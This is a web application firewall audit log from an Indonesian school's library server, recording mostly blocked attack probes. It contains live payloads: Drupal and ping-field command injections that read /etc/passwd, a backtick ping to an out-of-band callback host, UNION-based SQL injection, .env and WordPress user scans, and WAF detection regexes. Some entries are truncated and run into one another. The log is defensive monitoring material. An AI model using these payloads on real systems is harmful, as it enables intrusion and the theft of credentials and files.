--0c05f335-A-- [03/Jun/2025:00:35:18 +0700] aD3g1u6eDjh4wF4csdutdAAAAIA 103.236.140.4 58612 103.236.140.4 8181 --0c05f335-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 171487058 --0c05f335-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c05f335-E-- --0c05f335-H-- Message: Access denied with code 403 (phase 2). Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 171602165 --89243c43-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89243c43-E-- --89243c43-H-- Message: Access denied with code 403 (phase 2). Pattern match " --103b2f0e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --103b2f0e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748917175687952 6099 (- - -) Stopwatch2: 1748917175687952 6099; combined=4141, p1=574, p2=3471, p3=23, p4=31, p5=42, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --103b2f0e-Z-- --6a28bd35-A-- [03/Jun/2025:09:19:35 +0700] aD5bt0SujXvW2xVCZlVfvgAAAAY 103.236.140.4 41180 103.236.140.4 8181 --6a28bd35-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 16 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171745902 --6a28bd35-C-- whatever-content --6a28bd35-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a28bd35-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748917175692529 5413 (- - -) Stopwatch2: 1748917175692529 5413; combined=3968, p1=349, p2=3548, p3=19, p4=22, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a28bd35-Z-- --bf3c3b20-A-- [03/Jun/2025:09:19:35 +0700] aD5bt5AN5Lj366RdGMxmkwAAANc 103.236.140.4 41190 103.236.140.4 8181 --bf3c3b20-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 631 User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171662255 --bf3c3b20-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --bf3c3b20-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf3c3b20-E-- --bf3c3b20-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748917175694927 4870 (- - -) Stopwatch2: 1748917175694927 4870; combined=3795, p1=371, p2=3359, p3=20, p4=22, p5=23, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf3c3b20-Z-- --28b89771-A-- [03/Jun/2025:09:19:41 +0700] aD5bvZAN5Lj366RdGMxmngAAANU 103.236.140.4 41286 103.236.140.4 8181 --28b89771-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171127343 --28b89771-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28b89771-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748917181691888 2598 (- - -) Stopwatch2: 1748917181691888 2598; combined=1009, p1=374, p2=611, p3=0, p4=0, p5=24, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28b89771-Z-- --7369254d-A-- [03/Jun/2025:09:19:43 +0700] aD5bv0SujXvW2xVCZlVfwwAAABA 103.236.140.4 41320 103.236.140.4 8181 --7369254d-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171635673 --7369254d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7369254d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748917183692096 3429 (- - -) Stopwatch2: 1748917183692096 3429; combined=2010, p1=439, p2=1542, p3=0, p4=0, p5=28, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7369254d-Z-- --bea05c46-A-- [03/Jun/2025:09:43:32 +0700] aD5hVJAN5Lj366RdGMxr7wAAAMQ 103.236.140.4 33352 103.236.140.4 8181 --bea05c46-B-- POST /apply_sec.cgi HTTP/1.0 Referer: http://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 95 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 170192929 --bea05c46-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --bea05c46-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bea05c46-E-- --bea05c46-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748918612700718 2242 (- - -) Stopwatch2: 1748918612700718 2242; combined=673, p1=404, p2=242, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bea05c46-Z-- --14873f14-A-- [03/Jun/2025:10:18:57 +0700] aD5poQhM7ynDNybXsoNbogAAAEc 103.236.140.4 60176 103.236.140.4 8181 --14873f14-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3312.0 Safari/537.36 Accept-Charset: utf-8 --14873f14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14873f14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748920737111922 1064 (- - -) Stopwatch2: 1748920737111922 1064; combined=454, p1=413, p2=0, p3=0, p4=0, p5=41, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14873f14-Z-- --fef9d014-A-- [03/Jun/2025:11:21:28 +0700] aD54SESujXvW2xVCZlV7lQAAABU 103.236.140.4 52720 103.236.140.4 8181 --fef9d014-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-J710FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --fef9d014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fef9d014-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748924488001998 949 (- - -) Stopwatch2: 1748924488001998 949; combined=441, p1=395, p2=0, p3=0, p4=0, p5=45, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fef9d014-Z-- --4cc5e311-A-- [03/Jun/2025:11:27:15 +0700] aD55o5AN5Lj366RdGMyBBAAAAMQ 103.236.140.4 57150 103.236.140.4 8181 --4cc5e311-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 Accept-Charset: utf-8 --4cc5e311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cc5e311-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748924835348928 902 (- - -) Stopwatch2: 1748924835348928 902; combined=424, p1=367, p2=0, p3=0, p4=0, p5=57, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cc5e311-Z-- --69fc9a7c-A-- [03/Jun/2025:11:40:01 +0700] aD58oZAN5Lj366RdGMyD7wAAAMw 103.236.140.4 38710 103.236.140.4 8181 --69fc9a7c-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171814929 --69fc9a7c-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --69fc9a7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69fc9a7c-E-- --69fc9a7c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748925601776384 3859 (- - -) Stopwatch2: 1748925601776384 3859; combined=2359, p1=399, p2=1929, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69fc9a7c-Z-- --2f3ea660-A-- [03/Jun/2025:11:42:45 +0700] aD59RY0G58RZMmoh8H3jAQAAAIk 103.236.140.4 40752 103.236.140.4 8181 --2f3ea660-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 Accept-Charset: utf-8 --2f3ea660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f3ea660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748925765169894 835 (- - -) Stopwatch2: 1748925765169894 835; combined=344, p1=279, p2=0, p3=0, p4=0, p5=64, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f3ea660-Z-- --60034510-A-- [03/Jun/2025:11:55:38 +0700] aD6ASpAN5Lj366RdGMyG5gAAAMQ 103.236.140.4 50654 103.236.140.4 8181 --60034510-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.38 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --60034510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60034510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748926538409988 2942 (- - -) Stopwatch2: 1748926538409988 2942; combined=1361, p1=455, p2=877, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60034510-Z-- --60514617-A-- [03/Jun/2025:13:16:34 +0700] aD6TQkSujXvW2xVCZlWUfAAAAAQ 103.236.140.4 55240 103.236.140.4 8181 --60514617-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0us2vpgpeonc6qdbef041ojsi8up61qb.oast.me%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.1 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 171818922 --60514617-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --60514617-E-- --60514617-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0us2vpgpeonc6qdbef041ojsi8up61qb.oast.me`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748931394470123 2880 (- - -) Stopwatch2: 1748931394470123 2880; combined=800, p1=441, p2=314, p3=0, p4=0, p5=44, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60514617-Z-- --0b937f27-A-- [03/Jun/2025:13:16:34 +0700] aD6TQkSujXvW2xVCZlWUfgAAABQ 103.236.140.4 55246 103.236.140.4 8181 --0b937f27-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171818925 --0b937f27-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --0b937f27-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b937f27-E-- --0b937f27-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748931394506350 4917 (- - -) Stopwatch2: 1748931394506350 4917; combined=3703, p1=371, p2=3261, p3=22, p4=24, p5=25, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b937f27-Z-- --70c79062-A-- [03/Jun/2025:13:16:35 +0700] aD6TQ0SujXvW2xVCZlWUgQAAABI 103.236.140.4 55262 103.236.140.4 8181 --70c79062-B-- POST /xmlpserver/ReportTemplateService.xls HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 94 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171818931 --70c79062-C-- --70c79062-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --70c79062-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file 